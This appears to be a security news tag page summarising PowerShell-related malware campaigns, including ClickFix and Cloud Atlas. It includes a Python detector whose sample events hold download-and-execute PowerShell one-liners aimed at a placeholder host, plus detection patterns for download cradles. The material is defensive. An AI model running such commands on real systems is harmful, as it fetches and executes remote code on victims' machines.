Tag: PowerShell

Cryptocurrency Mining and Clipper Malware Distributed Through Cracked Software on SourceForge

Recent investigations have uncovered cybercriminals distributing malware disguised as cracked copies of legitimate applications, targeting users through the popular software hosting platform SourceForge. Among the payloads identified are cryptocurrency miners and clipper malware posing as Microsoft Office add-ons. A report from Kaspersky…


Winter Vivern APT Group Targets Officials in India, Lithuania, Slovakia, and the Vatican

The advanced persistent threat (APT) group known as Winter Vivern has targeted government entities in India, Lithuania, Slovakia, and the Vatican in campaigns dating back to 2021. Reports from SentinelOne indicate that among the specific targets are Polish government agencies, the Ukrainian Ministry of Foreign Affairs, and…


Cloud Atlas Unleashes VBCloud Malware: Over 80% of Affected Targets in Russia

Dec 27, 2024
Cyber Attack / Data Theft

The threat group known as Cloud Atlas has been observed using a newly identified malware family named VBCloud in its attack campaigns throughout 2024. According to Kaspersky researcher Oleg Kupreev, victims are infected through phishing emails carrying a malicious document that exploits a vulnerability in the Microsoft Office Equation Editor (CVE-2018-0802) to download and run the malware. Over 80% of the targets are based in Russia, with additional victims in Belarus, Canada, Moldova, Israel, Kyrgyzstan, Turkey, and Vietnam. Cloud Atlas, also tracked as Clean Ursa, Inception, Oxygen, and Red October, is an unattributed threat actor that has been active since 2014. In December 2022, the group was tied to attacks on Russia, Belarus, and Transnistria that deployed a PowerShell-based backdoor called PowerShower.

Cybercriminals Leverage ClickFix Technique to Distribute NetSupport RAT in Recent Attacks

February 11, 2025
Malware / Cyber Attack

Since early January 2025, cybercriminals have been using the ClickFix technique to distribute the remote access trojan known as NetSupport RAT. The malware, typically spread through deceptive websites and fake browser-update prompts, gives attackers full control of the victim’s device: they can watch the screen in real time, control the keyboard and mouse, upload and download files, and execute arbitrary commands.

Originally developed as a legitimate tool for IT support under the name NetSupport Manager, the software has been weaponized by malicious actors to target organizations and harvest sensitive information, including screenshots, audio, video, and files. According to eSentire, “ClickFix involves injecting a fake CAPTCHA webpage onto compromised sites, tricking users into executing malicious PowerShell commands that download and activate malware payloads.”
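Both the Cloud Atlas and ClickFix items above come down to a recognisable process chain: a document that makes the Equation Editor (EQNEDT32.EXE) spawn a child process, and a PowerShell one-liner launched from the Run dialog that downloads and executes a payload. The scanner below is an added example written for this page, not code from eSentire, Kaspersky or the reporting above. It runs over constructed process-creation events (the kind Sysmon event 1 or EDR telemetry would give you), decodes a `-EncodedCommand` argument before scoring it, and flags both chains. The rule names, weights, threshold, sample paths and sample command lines are this example's own assumptions and would need tuning against a real baseline.

```python
"""Flag ClickFix-style PowerShell launches and Equation Editor child processes.

Added example for this page; the events, weights and threshold are constructed
assumptions, not data from any vendor report.
"""
import base64
import re
from dataclasses import dataclass, field
from typing import List, Optional


@dataclass
class ProcEvent:
    parent_image: str
    image: str
    command_line: str


@dataclass
class Finding:
    rule: str
    score: int
    reasons: List[str] = field(default_factory=list)


POWERSHELL = {"powershell.exe", "pwsh.exe"}
# The Win+R Run dialog is hosted by explorer.exe, so a ClickFix one-liner usually
# shows up as explorer.exe -> powershell.exe (assumption: extend with your own baseline).
RUN_DIALOG_PARENTS = {"explorer.exe"}

ENCODED = re.compile(r"-(e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)
# (name, weight, pattern); weights and THRESHOLD are this example's own tuning.
CHECKS = [
    ("download cradle", 2, re.compile(r"\b(iwr|invoke-webrequest|invoke-restmethod|irm|"
                                      r"downloadstring|downloadfile|webclient|"
                                      r"start-bitstransfer|curl|wget)\b", re.I)),
    ("in-memory execute", 2, re.compile(r"\b(iex|invoke-expression)\b", re.I)),
    ("hidden window", 1, re.compile(r"-(w|win|window|windowstyle)\s+h(idden)?\b", re.I)),
    ("policy bypass", 1, re.compile(r"-(ep|exec|executionpolicy)\s+bypass\b", re.I)),
    ("remote url", 1, re.compile(r"https?://", re.I)),
]
THRESHOLD = 4


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def encode_command(script: str) -> str:
    """Build a -EncodedCommand argument the way PowerShell expects it (UTF-16LE, base64)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(command_line: str) -> str:
    """Return the script hidden behind -EncodedCommand, or '' if absent or malformed."""
    m = ENCODED.search(command_line)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(2), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):  # binascii.Error is a ValueError
        return ""


def analyze(ev: ProcEvent) -> Optional[Finding]:
    """Score one process-creation event; return a Finding if it crosses THRESHOLD."""
    parent, image = _basename(ev.parent_image), _basename(ev.image)
    # Equation Editor has no business spawning anything: a child process is the
    # classic sign of CVE-2017-11882 / CVE-2018-0802 exploitation.
    if parent == "eqnedt32.exe":
        return Finding("equation-editor-child", THRESHOLD, [f"EQNEDT32.EXE spawned {image}"])
    if image not in POWERSHELL:
        return None
    score, reasons = 0, []
    text = ev.command_line
    decoded = decode_encoded_command(text)
    if decoded:
        score += 1
        reasons.append("encoded command")
        text = f"{text} {decoded}"  # score the decoded layer as well as the raw one
    for name, weight, pattern in CHECKS:
        if pattern.search(text):
            score += weight
            reasons.append(name)
    if parent in RUN_DIALOG_PARENTS:
        score += 1
        reasons.append(f"launched from {parent}")
    return Finding("clickfix-powershell", score, reasons) if score >= THRESHOLD else None


def scan(events) -> List[Finding]:
    return [f for f in (analyze(e) for e in events) if f]


# Constructed sample telemetry (not real logs); invalid.example is a placeholder host.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Windows\explorer.exe", PS,
              'powershell -w hidden -ep bypass -c "iwr https://invalid.example/x.ps1 | iex"'),
    ProcEvent(r"C:\Windows\explorer.exe", PS,
              "powershell -nop -enc " + encode_command("iex (irm https://invalid.example/a)")),
    ProcEvent(r"C:\Program Files\Microsoft Office\root\Office16\EQNEDT32.EXE",
              r"C:\Windows\System32\cmd.exe", "cmd /c whoami"),
    ProcEvent(r"C:\Windows\System32\cmd.exe", PS,
              r"powershell.exe -ExecutionPolicy Bypass -File C:\scripts\backup.ps1"),
    ProcEvent(r"C:\Windows\explorer.exe", PS, "powershell Get-Process | Sort-Object CPU"),
]

if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f"{f.rule:24} score={f.score}  {', '.join(f.reasons)}")
```

The scheduled admin script (`-ExecutionPolicy Bypass -File ...`) scores only 1 and is left alone, which is the point of weighting a download cradle and `iex` higher than the evasion flags on their own; an encoded command is scored on its decoded contents, since `-enc` alone is common in legitimate tooling.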

Hackers Discover Innovative Methods to Conceal Malware within DNS Records

Cybersecurity researchers have uncovered a new tactic in which attackers stash malware inside domain name system (DNS) records, a method that poses real challenges for traditional defenses. The technique abuses DNS, the infrastructure that maps domain names to their numerical IP addresses, as a storage and delivery channel, so the payload is retrieved over a protocol that most controls allow through and rarely inspect, and malicious scripts can operate largely unnoticed. Recent…


GitHub Exploited to Distribute Amadey, Lumma, and Redline InfoStealers in Ukraine

A newly uncovered Malware-as-a-Service (MaaS) scheme is leveraging GitHub repositories to disseminate various infostealer families. This discovery was made by cybersecurity analysts at Cisco Talos, who released their findings today. The report details how the threat actors are utilizing the Amadey bot to directly source malware from public GitHub repositories…


iClicker Website Compromised by ClickFix Attack Featuring Fake CAPTCHA

The iClicker website, a widely-used student engagement platform, was recently compromised in a ClickFix attack, deceiving users into installing malware via a fake “I’m not a robot” verification. Insights into the extent of the breach and protective measures are outlined below. iClicker, a crucial digital tool utilized for classroom engagement…
